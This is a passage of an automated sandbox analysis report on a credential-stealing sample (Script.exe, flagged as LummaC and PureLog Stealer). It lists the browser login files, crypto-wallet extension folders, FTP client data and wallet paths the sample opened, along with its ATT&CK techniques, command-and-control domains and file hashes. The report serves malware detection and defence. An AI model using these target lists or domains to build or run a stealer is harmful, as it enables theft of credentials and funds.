Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Script.exe PID: 1480, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Script.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Script.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Script.exe.3979550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Script.exe.3979550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2001576225.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	4 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Script.exe	45%	ReversingLabs	Win32.Trojan.Nekark
Script.exe	53%	Virustotal		Browse
Script.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://fancywaxxers.shop/t	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/m	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiT	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiY	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.80.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
https://fancywaxxers.shop/api	false	high
rabidcowse.shop	false	high
wholersorie.shop	false	high
fancywaxxers.shop	false	high
framekgirus.shop	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ocsp.entrust.net03	Script.exe	false		high
http://ocsp.entrust.net02	Script.exe	false		high
http://www.entrust.net/rpa03	Script.exe	false		high
http://aia.entrust.net/ts1-chain256.cer01	Script.exe	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://fancywaxxers.shop/apiT	Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	Script.exe	false		high
https://fancywaxxers.shop/	Script.exe, 00000002.00000002.3253797815.0000000003DE2000.00000004.00000800.00020000.00000000.sdmp, Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/m	Script.exe, 00000002.00000002.3253312879.000000000165B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/2048ca.crl0	Script.exe	false		high
https://www.entrust.net/rpa0	Script.exe	false		high
https://fancywaxxers.shop/t	Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/apiY	Script.exe, 00000002.00000002.3253440028.00000000016CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	fancywaxxers.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584528
Start date and time:	2025-01-05 19:08:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Script.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 39 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 104.208.16.94, 20.190.159.4, 4.175.87.197, 23.1.237.91, 13.107.246.45
Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:08:57	API Interceptor	8x Sleep call for process: Script.exe modified
13:08:59	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	104.21.112.1
	nayfObR.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.178.174
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.163.221
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.32.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.21.63
	SET_UP.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	'Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	'Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Script.exe_c863c4e66bc5d0f1221d81680df4e591d56618e_6f1b0a17_3c1ccc1c-41cd-4272-b639-bdca7271f16b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8866549560200585
Encrypted:	false
SSDEEP:	96:OnuFGfRfsygejTOAqyS3QXIDcQlc6VcEdcw3V+BHUHZ0ownOgHkEwH3dEFYAKck+:hoJfuA0LR3EauGzuiFca9Z24IO8nP
MD5:	DF4C9EC8CF6BA238652249BBD235D251
SHA1:	1AB325251CC726E2D6F3E2ABA00243D450068D67
SHA-256:	88F5D1CA6C9AF25A1643716F00B8260EDA4D6B3BA150B2B53096FE00C1F06128
SHA-512:	101D3208632B1237CEDAED2F0152712826EB22107FA0EA57A2ADF6CBCB4AD08275FE800AD799E5A54343D121F658757D57BF67C516A90B96BBC84BA9001EE73D
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.7.4.1.3.6.5.4.7.5.0.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.7.4.1.3.7.0.0.0.6.2.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.1.c.c.c.1.c.-.4.1.c.d.-.4.2.7.2.-.b.6.3.9.-.b.d.c.a.7.2.7.1.f.1.6.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.e.9.b.0.f.c.-.a.b.d.a.-.4.f.b.b.-.8.b.2.2.-.7.b.6.6.f.1.8.5.c.c.b.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.c.r.i.p.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.c.4.-.0.0.0.1.-.0.0.1.4.-.6.f.c.d.-.9.e.e.2.9.c.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.1.7.c.9.a.0.0.6.7.a.d.3.2.5.d.a.8.7.a.0.9.6.e.6.2.7.1.5.8.4.8.b.8.f.c.4.e.a.3.4.!.S.c.r.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER576.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Jan 5 18:08:56 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	161744
Entropy (8bit):	3.592417838679198
Encrypted:	false
SSDEEP:	1536:S8wUrWcQpN4uE2aOAdnDtTywLTgkctmxpouBojRY1XUVCD9Ad7l:vtWcG4uEqanJfLTgkctmIY1XjA
MD5:	BA232AFE1766E9E11557DD7553ACA6A5
SHA1:	E0E9966CC2681D4FA40BEFED69CE725926A3107F
SHA-256:	5320EF9812DD79BBFC15CBFC4E7495CC9094C2C65C48AD34270DD4FCEA263828
SHA-512:	C0C6989DBC4DF828DECCF2CA0A7CD07D044A40BD3E5934500D012428FB1D8084081B3F21DAC96DF062166320224D19D432C64574276450C75E725F4C280A7890
Malicious:	false
Reputation:	low
